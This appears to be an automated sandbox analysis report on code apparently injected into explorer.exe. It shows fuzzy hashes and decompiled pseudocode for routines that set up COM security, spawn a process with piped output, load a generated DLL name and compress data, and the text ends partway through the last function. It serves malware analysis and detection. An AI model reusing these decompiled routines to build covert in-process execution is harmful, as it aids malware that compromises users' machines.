Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
Instruction ID: a89b29efd16a02d44f6d8e25ac1661f5a2b1d21aaf5940480051179919990030
Opcode Fuzzy Hash: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
Instruction Fuzzy Hash: 1821F975900218AFDB10EFA5CC88DAFBBBDFF48654B10449AF505E7250DA71AE01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 000907F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

\u%04X\u%04X, xrefs: 00090950
@, xrefs: 00090865
\u%04X, xrefs: 00090911

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
Instruction ID: fcde36fe93850f7dd9ad1ae31ae76e92f94782fe824cdb2d7e9ac6baa3171ba9
Opcode Fuzzy Hash: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
Instruction Fuzzy Hash: C6411931700205EFEF784A9CCD9ABBF2AA8DF45340F244125F986D6396DA61CD91B3D1

Uniqueness

Uniqueness Score: -1.00%

Function 0008D523, Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E0008D523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x9b848, 0, 1, 0x9b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E00088604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

0x0008d530
0x0008d533
0x0008d536
0x0008d547
0x0008d54d
0x0008d55e
0x0008d566
0x0008d5b7
0x0008d5b7
0x0008d5bc
0x0008d5c1
0x0008d5c1
0x0008d5c4
0x0008d5c9
0x0008d5ce
0x0008d5ce
0x0008d5d1
0x0008d568
0x0008d569
0x0008d56f
0x0008d580
0x0008d585
0x00000000
0x0008d587
0x0008d594
0x0008d59c
0x00000000
0x0008d59e
0x0008d5a0
0x0008d5a8
0x00000000
0x0008d5aa
0x0008d5ad
0x0008d5b3
0x0008d5b3
0x0008d5a8
0x0008d59c
0x0008d585
0x0008d5d6

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
SysAllocString.OLEAUT32(00000000), ref: 0008D569
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 1610782348-0
Opcode ID: 10b5e74f8a59f27958c0d6474d468863946cdabe288dbe1f51fb48886bb044ac
Instruction ID: 5ca9e363416111ca0ccf9453dcb24a0453d396344b9ddfdbf921160754929c58
Opcode Fuzzy Hash: 10b5e74f8a59f27958c0d6474d468863946cdabe288dbe1f51fb48886bb044ac
Instruction Fuzzy Hash: 6F21E970600245BBEB249B66DC4DE6FBFBCFFC6B25F10415EB541A62A0DA709A01CB30

Uniqueness

Uniqueness Score: -1.00%

Function 000921FF, Relevance: 7.6, APIs: 5, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E000921FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L000922CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L00092291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x98250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L00092291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x98258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}

0x000921ff
0x00092207
0x0009220c
0x0009220f
0x00092214
0x0009221a
0x00092223
0x00092227
0x00092227
0x00092223
0x00092229
0x0009222e
0x00092237
0x0009223c
0x0009223f
0x00092248
0x0009224a
0x00092251
0x00092262
0x00092262
0x00092264
0x0009226c
0x00092273
0x00000000
0x0009226e
0x00092272
0x00092272
0x00092253
0x00092253
0x00092259
0x0009225b
0x00092260
0x00092276
0x00092279
0x0009227e
0x00000000
0x00000000
0x00000000
0x00092260

APIs

localeconv.MSVCRT ref: 00092207
strchr.MSVCRT ref: 0009221A
_errno.MSVCRT ref: 00092229
strtod.MSVCRT ref: 00092237
_errno.MSVCRT ref: 00092264

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: _errno$localeconvstrchrstrtod
String ID:
API String ID: 1035490122-0
Opcode ID: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
Instruction ID: 9be57ecffa989f7d2828815fae2d17a9d7f4e019258d81125002a8d3572c8328
Opcode Fuzzy Hash: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
Instruction Fuzzy Hash: 7701F239904205FADF127F24E9057DD7BA8AF4B360F2041D1E9D0A61E2DB759854E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0008A9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177
pipeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0008A9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E0008861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x9e684; // 0x34f8f0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x9e684; // 0x34f8f0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E00088604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x9e684; // 0x34f8f0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x9e684; // 0x34f8f0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x9e684; // 0x34f8f0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x9e684; // 0x34f8f0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E000891A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E00089292(_t127);
						E0008861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E0008C379(_t127));
				_t98 =  *0x9e68c; // 0x34fab8
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x9e684; // 0x34f8f0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x9e684; // 0x34f8f0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E00089256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E0008861A( &_v32, 0);
				return _t128;
			}

0x0008a9c2
0x0008a9c4
0x0008a9d0
0x0008a9d5
0x0008a9d8
0x0008a9da
0x0008a9dd
0x0008a9e0
0x0008a9e7
0x0008a9ea
0x0008a9f1
0x0008a9f4
0x0008a9fe
0x0008a9ff
0x0008aa02
0x0008aa04
0x0008aa05
0x0008aa1c
0x0008ab9c
0x00000000
0x0008ab9c
0x0008aa33
0x0008ab68
0x0008ab6e
0x0008ab79
0x0008ab7b
0x0008ab83
0x0008ab83
0x0008ab8a
0x0008ab8c
0x0008ab95
0x0008ab95
0x00000000
0x0008ab98
0x0008aa39
0x0008aa3c
0x0008aa3f
0x0008aa45
0x0008aa4f
0x0008aa59
0x0008aa60
0x0008aa69
0x0008aa6b
0x0008aa71
0x00000000
0x00000000
0x0008aa7c
0x0008aa83
0x0008aa84
0x0008aa89
0x0008aa8a
0x0008aa8b
0x0008aa90
0x0008aa92
0x0008aa93
0x0008aa94
0x0008aa97
0x0008aa9d
0x00000000
0x00000000
0x0008aaa3
0x0008aaab
0x0008aaae
0x0008aab6
0x0008aab9
0x0008aabc
0x0008aac2
0x0008aad6
0x0008aadc
0x0008aae2
0x0008ab0b
0x0008aae4
0x0008aae4
0x0008aae6
0x0008aae8
0x0008aaf0
0x0008aaf8
0x0008aafd
0x0008aafd
0x0008ab11
0x0008ab13
0x0008ab13
0x0008ab1b
0x0008ab23
0x0008ab24
0x0008ab29
0x0008ab32
0x0008ab52
0x0008ab52
0x0008ab5a
0x0008ab5d
0x0008ab65
0x00000000
0x0008ab65
0x0008ab3b
0x0008ab3f
0x00000000
0x00000000
0x0008ab47
0x00000000

APIs

memset.MSVCRT ref: 0008A9F4
CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 0008AA18
CreatePipe.KERNEL32(000865A9,?,0000000C,00000000), ref: 0008AA2F

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660

Strings

D, xrefs: 0008AA4F

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CreateHeapPipe$AllocateFreememset
String ID: D
API String ID: 2365139273-2746444292
Opcode ID: 6f0b75088f2de3f72156e0999c4a814b79d37797bc9ee56fa71e6c034334ef96
Instruction ID: 1038731307509bc63423b83b895d9a6edc7a8df2068bd220f00375d18a9fab8d
Opcode Fuzzy Hash: 6f0b75088f2de3f72156e0999c4a814b79d37797bc9ee56fa71e6c034334ef96
Instruction Fuzzy Hash: 3A512C72E00209AFEB51EFA4CC45FDEBBB9BB08300F14416AF544E7152EB7499048B61

Uniqueness

Uniqueness Score: -1.00%

Function 0008C4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
libraryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0008C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x9e688; // 0xb0000
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E000895E1(_t50, 0xb62);
					_t66 =  *0x9e688; // 0xb0000
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E00089640( &_v140, 0x40, L"%08x", E0008D400(_t66 + 0xb0, E0008C379(_t66 + 0xb0), 0));
					_t20 =  *0x9e688; // 0xb0000
					asm("sbb eax, eax");
					_t25 = E000895E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x9e688; // 0xb0000
					_t68 = E000892E5(_t26 + 0x1020);
					_v12 = _t68;
					E000885D5( &_v8);
					_t32 =  *0x9e688; // 0xb0000
					_t34 = E000892E5(_t32 + 0x122a);
					 *0x9e784 = _t34;
					_t35 =  *0x9e684; // 0x34f8f0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x9e784);
					 *0x9e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E0008E171(0x9bb48, _t60);
					}
					 *0x9e780 = _t38;
					E0008861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x9e780 != 0) {
						goto L10;
					} else {
						E0008861A(0x9e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x9e780 == 0) {
						_t46 =  *0x9e6bc; // 0x34fa18
						 *0x9e780 = _t46;
					}
					L10:
					return 1;
				}
			}

0x0008c4ce
0x0008c4ce
0x0008c4ce
0x0008c4d1
0x0008c4dd
0x0008c4e8
0x0008c504
0x0008c509
0x0008c512
0x0008c514
0x0008c51c
0x0008c53d
0x0008c542
0x0008c54f
0x0008c55a
0x0008c561
0x0008c568
0x0008c579
0x0008c57f
0x0008c582
0x0008c599
0x0008c5a5
0x0008c5ad
0x0008c5b4
0x0008c5ba
0x0008c5c6
0x0008c5cc
0x0008c5d3
0x0008c5e6
0x0008c5d5
0x0008c5d5
0x0008c5d8
0x0008c5de
0x0008c5e3
0x0008c5e8
0x0008c5f3
0x0008c605
0x0008c617
0x00000000
0x0008c619
0x0008c620
0x00000000
0x0008c626
0x0008c627
0x0008c627
0x0008c62e
0x0008c630
0x0008c635
0x0008c635
0x0008c63a
0x0008c63e
0x0008c63e

APIs

LoadLibraryW.KERNEL32 ref: 0008C5C6
memset.MSVCRT ref: 0008C605

Strings

%08x, xrefs: 0008C52F
dll, xrefs: 0008C588

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: LibraryLoadmemset
String ID: %08x$dll
API String ID: 3406617148-2963171978
Opcode ID: 87e5f68a68811af9e61fea65288c3ec2a75dfa89854a5d60e79bb7a89bb2a2ff
Instruction ID: f3dd22374d708548471efb5ddff1d4c344fbc2453a9af2a3a2ac9a4f9c61bf9a
Opcode Fuzzy Hash: 87e5f68a68811af9e61fea65288c3ec2a75dfa89854a5d60e79bb7a89bb2a2ff
Instruction Fuzzy Hash: BB31B3B2A00244BBFB10FBA8EC89FAA73ACFB54354F544036F145D7192EB789D418725

Uniqueness

Uniqueness Score: -1.00%

Function 00092D70, Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00092D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E00095D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E00094AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E00094C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E00094C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E00095D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E00094AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
